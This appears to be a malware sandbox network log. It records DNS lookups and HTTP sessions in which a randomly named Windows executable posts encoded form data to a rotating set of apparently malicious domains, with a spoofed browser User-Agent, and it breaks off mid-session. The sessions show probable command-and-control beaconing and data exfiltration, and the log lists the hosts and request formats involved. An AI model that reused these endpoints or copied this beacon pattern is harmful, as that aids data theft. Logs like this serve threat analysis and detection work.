Jan 3, 2025 11:40:53.248677015 CET | 192.168.2.4 | 1.1.1.1 | 0x2284 | Standard query (0) | www.investshares.net | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:41:06.936558962 CET | 192.168.2.4 | 1.1.1.1 | 0x6f91 | Standard query (0) | www.nosolofichas.online | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:41:20.139514923 CET | 192.168.2.4 | 1.1.1.1 | 0x8171 | Standard query (0) | www.jrcov55qgcxp5fwa.top | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:41:34.170521021 CET | 192.168.2.4 | 1.1.1.1 | 0xde3b | Standard query (0) | www.adadev.info | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:41:48.483963966 CET | 192.168.2.4 | 1.1.1.1 | 0x8f4e | Standard query (0) | www.cifasnc.info | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:42:01.702132940 CET | 192.168.2.4 | 1.1.1.1 | 0x3528 | Standard query (0) | www.ebsmadrid.store | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:42:09.782705069 CET | 192.168.2.4 | 1.1.1.1 | 0x2ae3 | Standard query (0) | www.denture-prices.click | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:42:23.031011105 CET | 192.168.2.4 | 1.1.1.1 | 0x333e | Standard query (0) | www.sonixingenuine.shop | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:42:36.703308105 CET | 192.168.2.4 | 1.1.1.1 | 0xb84 | Standard query (0) | www.moyu19.pro | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 3, 2025 11:39:42.554909945 CET | 1.1.1.1 | 192.168.2.4 | 0xd110 | No error (0) | www.gayhxi.info | | 47.83.1.90 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:39:59.292108059 CET | 1.1.1.1 | 192.168.2.4 | 0x55cc | No error (0) | www.promocao.info | promocao.info | | CNAME (Canonical name) | IN (0x0001) | false
Jan 3, 2025 11:39:59.292108059 CET | 1.1.1.1 | 192.168.2.4 | 0x55cc | No error (0) | promocao.info | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:40:12.573307037 CET | 1.1.1.1 | 192.168.2.4 | 0x3435 | No error (0) | www.grimbo.boats | | 104.21.18.171 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:40:12.573307037 CET | 1.1.1.1 | 192.168.2.4 | 0x3435 | No error (0) | www.grimbo.boats | | 172.67.182.198 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:40:26.359828949 CET | 1.1.1.1 | 192.168.2.4 | 0xbb00 | No error (0) | www.44756.pizza | zcdn.8383dns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 3, 2025 11:40:26.359828949 CET | 1.1.1.1 | 192.168.2.4 | 0xbb00 | No error (0) | zcdn.8383dns.com | | 134.122.133.80 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:40:26.359828949 CET | 1.1.1.1 | 192.168.2.4 | 0xbb00 | No error (0) | zcdn.8383dns.com | | 134.122.135.48 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:40:39.948384047 CET | 1.1.1.1 | 192.168.2.4 | 0xba83 | No error (0) | www.lonfor.website | | 199.192.21.169 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:40:53.616429090 CET | 1.1.1.1 | 192.168.2.4 | 0x2284 | No error (0) | www.investshares.net | | 154.197.162.239 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:41:06.983355999 CET | 1.1.1.1 | 192.168.2.4 | 0x6f91 | No error (0) | www.nosolofichas.online | nosolofichas.online | | CNAME (Canonical name) | IN (0x0001) | false
Jan 3, 2025 11:41:06.983355999 CET | 1.1.1.1 | 192.168.2.4 | 0x6f91 | No error (0) | nosolofichas.online | | 84.32.84.32 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:41:20.584656000 CET | 1.1.1.1 | 192.168.2.4 | 0x8171 | No error (0) | www.jrcov55qgcxp5fwa.top | zcdn.8383dns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 3, 2025 11:41:20.584656000 CET | 1.1.1.1 | 192.168.2.4 | 0x8171 | No error (0) | zcdn.8383dns.com | | 134.122.133.80 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:41:20.584656000 CET | 1.1.1.1 | 192.168.2.4 | 0x8171 | No error (0) | zcdn.8383dns.com | | 134.122.135.48 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:41:34.193356991 CET | 1.1.1.1 | 192.168.2.4 | 0xde3b | No error (0) | www.adadev.info | | 47.83.1.90 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:41:48.503921032 CET | 1.1.1.1 | 192.168.2.4 | 0x8f4e | No error (0) | www.cifasnc.info | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:41:48.503921032 CET | 1.1.1.1 | 192.168.2.4 | 0x8f4e | No error (0) | www.cifasnc.info | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:42:01.711157084 CET | 1.1.1.1 | 192.168.2.4 | 0x3528 | Name error (3) | www.ebsmadrid.store | none | none | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:42:09.848511934 CET | 1.1.1.1 | 192.168.2.4 | 0x2ae3 | No error (0) | www.denture-prices.click | | 199.59.243.228 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:42:23.063174009 CET | 1.1.1.1 | 192.168.2.4 | 0x333e | No error (0) | www.sonixingenuine.shop | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 3, 2025 11:42:23.063174009 CET | 1.1.1.1 | 192.168.2.4 | 0x333e | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:42:23.063174009 CET | 1.1.1.1 | 192.168.2.4 | 0x333e | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 11:42:37.162441969 CET | 1.1.1.1 | 192.168.2.4 | 0xb84 | No error (0) | www.moyu19.pro | | 154.39.239.237 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 47.83.1.90 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 11:39:42.580204010 CET | 466 | OUT | GET /k2i2/?1V=oYl0YuhK+EfenM8eRya5NBLYEg3QT0lWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTYH71Qo8BiJAJadzAW0K4pL4P2w4s2MVD1OU=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.gayhxi.info
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
Jan 3, 2025 11:39:44.158767939 CET | 139 | IN | HTTP/1.1 567 unknown
                                                                    Server: nginx/1.18.0
                                                                    Date: Fri, 03 Jan 2025 10:39:44 GMT
                                                                    Content-Length: 17
                                                                    Connection: close
                                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                    Data Ascii: Request too large


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49773 | 84.32.84.32 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 11:39:59.349128008 CET | 734 | OUT | POST /zaz4/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.promocao.info
                                                                    Origin: http://www.promocao.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.promocao.info/zaz4/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvOnB7i2RVcK+Xql9nS8jzCZaPJ1BQHVczg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49788 | 84.32.84.32 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 11:40:02.007220030 CET | 754 | OUT | POST /zaz4/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.promocao.info
                                                                    Origin: http://www.promocao.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.promocao.info/zaz4/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1sphH+0HUrw+x1g+ANp/nKkYWxx0wNz10gf/npji0pttRkNpGIaxKSC4dQ0vTQcKBqFKeWbdI/c2GUIzzdEzsCqd4xPJ9viug4TiKsJbgxRKpQpOlDWEBFLm+iI2BS/d9uBWson2jd0hC9pSO81dEoVoi86cFbnuZAsHknnp51DZIU=


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    3 | 192.168.2.4 | 49805 | 84.32.84.32 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:04.561172962 CET | 10836 | OUT | POST /zaz4/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.promocao.info
                                                                    Origin: http://www.promocao.info
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.promocao.info/zaz4/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V= [TRUNCATED]


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    4 | 192.168.2.4 | 49824 | 84.32.84.32 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:07.103847027 CET | 468 | OUT | GET /zaz4/?1V=a/HH2smDyRg6YmpKuJDswFozPckyMxHERV51bzugA0E0jiOKNXfjwD9byDsX3ja9PlsooGpF4nQX9l9Mtzddhjtb005hxLSZzuVPoFRXMGu9Cf/2KLmHwwY=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.promocao.info
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:40:07.550666094 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                    Date: Fri, 03 Jan 2025 10:40:07 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 9973
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Server: hcdn
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: f35d08198c93f120a5f50d757b8cd87c-bos-edge1
                                                                    Expires: Fri, 03 Jan 2025 10:40:06 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes
                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    5 | 192.168.2.4 | 49859 | 104.21.18.171 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:12.594893932 CET | 731 | OUT | POST /kxtt/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.grimbo.boats
                                                                    Origin: http://www.grimbo.boats
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.grimbo.boats/kxtt/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=TAdIAPIeJFxh7wR1yAcPuJnRbKxw9zvG4JH37pTFE8DWvP/H4oruGYFQRVljObqttpGm1yj3XBpKR/0OeQ08txB1MsI0mj5BGwcYsazf2zauHlIl99XS6fsrSkQs0uEcgX60ZKGVuMswdzmX6WnSOw5Jeo27zXmr4/o4PxsttxLVrNXEpwZzSAXe4QWLA5XlkA==
                                                                    Jan 3, 2025 11:40:13.230781078 CET | 1091 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:13 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fDiyxrkpkK%2FuFGML0uUap2rQ3EptqY%2FciHyVTk%2FNdUhiG4kev%2FShO5TweBIYXcFtkHMlwbI4rK8MJmw3cQZK%2B%2BmBhgD0TBQWou7b1hc4N8M5lF%2BFepssTAhFF9Tl22R7fequ"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc25e912fc780d6-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1588&rtt_var=794&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    6 | 192.168.2.4 | 49875 | 104.21.18.171 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:15.206708908 CET | 751 | OUT | POST /kxtt/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.grimbo.boats
                                                                    Origin: http://www.grimbo.boats
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.grimbo.boats/kxtt/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=TAdIAPIeJFxh0xh13j0PppnSHaxwkDvK4JL37r/zEO3WsvPHqcfuDYFQJFlmRLqitpKu12r3XB9KR6IOdjM/shB3NcI2lT5BGwcYsam42ziuHWQl8YjVz/skVkQs+OEQgX7TZLq/uJwwdzWX6nndAw4CQI3klXX3xadTPQEqoArtuLae4B4kAAztlXf/N6qs/JGO5oDgz95Au7j3GEnYat0=
                                                                    Jan 3, 2025 11:40:15.806989908 CET | 1098 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:15 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2FUGwMqTdDiIcJ%2BONzJV8j27%2BqDZosSTp2pYPNUtQt7njdRmSvWk29Z15FzbqpSeELWxkW3qz%2FPje%2BVozuX%2F%2BqSqNOgKrpzQ4lYXCfPKG52R7FwUK%2B5NjdJN3J6JTorjTpY2"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc25ea14f97428b-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1549&rtt_var=774&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    7 | 192.168.2.4 | 49891 | 104.21.18.171 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:17.848890066 CET | 10833 | OUT | POST /kxtt/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.grimbo.boats
                                                                    Origin: http://www.grimbo.boats
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.grimbo.boats/kxtt/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V= [TRUNCATED]
                                                                    Jan 3, 2025 11:40:18.424420118 CET | 1091 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:18 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4CLRCpe2cnLf4N1URG%2BkjTJhyg0CluvUJbhOL%2Fystyo5JCe9G7Al9MreSp13dHPYMUYGFsCt7XgojiAjkC%2F3H1Z0AEevAlHa7DKOf0elEjdKsxR9uc7vlLd0qQg2dG9l0v6E"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc25eb19b6a187d-EWR
                                                                    Content-Encoding: gzip
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1623&rtt_var=811&sent=5&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10833&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    8 | 192.168.2.4 | 49912 | 104.21.18.171 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:20.387032986 CET | 467 | OUT | GET /kxtt/?w0DDw=KH0hz6&1V=eC1oD4IhFSd/6jtM+gh2zJzzIbkctzW5zKGW4KqWLMPitrzcqar0FZhKX10RVuOt75j4smH0EDZzb9gyazsXhx4kXv42kRkXOBgymbjdyCqqE2F8kr6Zzpg= HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.grimbo.boats
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:40:21.031281948 CET | 1099 | IN | HTTP/1.1 404 Not Found
                                                                    Date: Fri, 03 Jan 2025 10:40:20 GMT
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ly%2Fd9RibHA84VfMWqJwvyJ5obQbaW1gfczgzjCecOgQwB1eSOMtWx9AQFSWnL9Zfoq8UH4xvSHBOKRENJ%2BZvl0EXa95vtbvY%2FHUVvUOcC62S2xStTePS678fYAnMR7TajF14"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8fc25ec1daa24239-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1579&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=467&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                    Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    9 | 192.168.2.4 | 49953 | 134.122.133.80 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:26.381134987 CET | 728 | OUT | POST /a59t/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.44756.pizza
                                                                    Origin: http://www.44756.pizza
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.44756.pizza/a59t/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=1zjaTPzvwErQ9hppx67l7j5fg0cboEoNNjbwggVOOIixAI24Z4QbKhwgEVmPDzJMc8e7/FnXKM0p5LEph66QpvuuaibuaFVpVHrvRGEWBb1xndRXdjdExgNpmto9K+cAsBGPGGZo1GqPOKLVh9b5UEaVZJkONs3VpT5yxMNQWKZZmiFW0eCd3IXSjSYayRuXBA==
                                                                    Jan 3, 2025 11:40:27.236280918 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Length: 148
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:40:27 GMT
                                                                    Etag: "6743f11f-94"
                                                                    Server: nginx
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    10 | 192.168.2.4 | 49969 | 134.122.133.80 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:28.922775984 CET | 748 | OUT | POST /a59t/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.44756.pizza
                                                                    Origin: http://www.44756.pizza
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.44756.pizza/a59t/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Ascii: 1V=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO7WxDoG4Y5QbZRwgM1mGejJTc8SV/EbXKMgp5L0phJCTp/ugByboQlVpVHrvRHh7BYFxnJVXcB5HygMbuNo9cOccsBGhGH1G1FSPOL7Vhvz6dEaXUplJFMuJhmQ/zqlfX7VdnkIMlvjKlIzh+VRu/STeaOycq0CND1hPfGWobmebmPY=
                                                                    Jan 3, 2025 11:40:29.785847902 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                    Content-Length: 148
                                                                    Content-Type: text/html
                                                                    Date: Fri, 03 Jan 2025 10:40:29 GMT
                                                                    Etag: "6743f11f-94"
                                                                    Server: nginx
                                                                    Connection: close
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    11 | 192.168.2.4 | 49988 | 134.122.133.80 | 80 | 1748 | C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 3, 2025 11:40:31.470673084 CET | 10830 | OUT | POST /a59t/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.44756.pizza
                                                                    Origin: http://www.44756.pizza
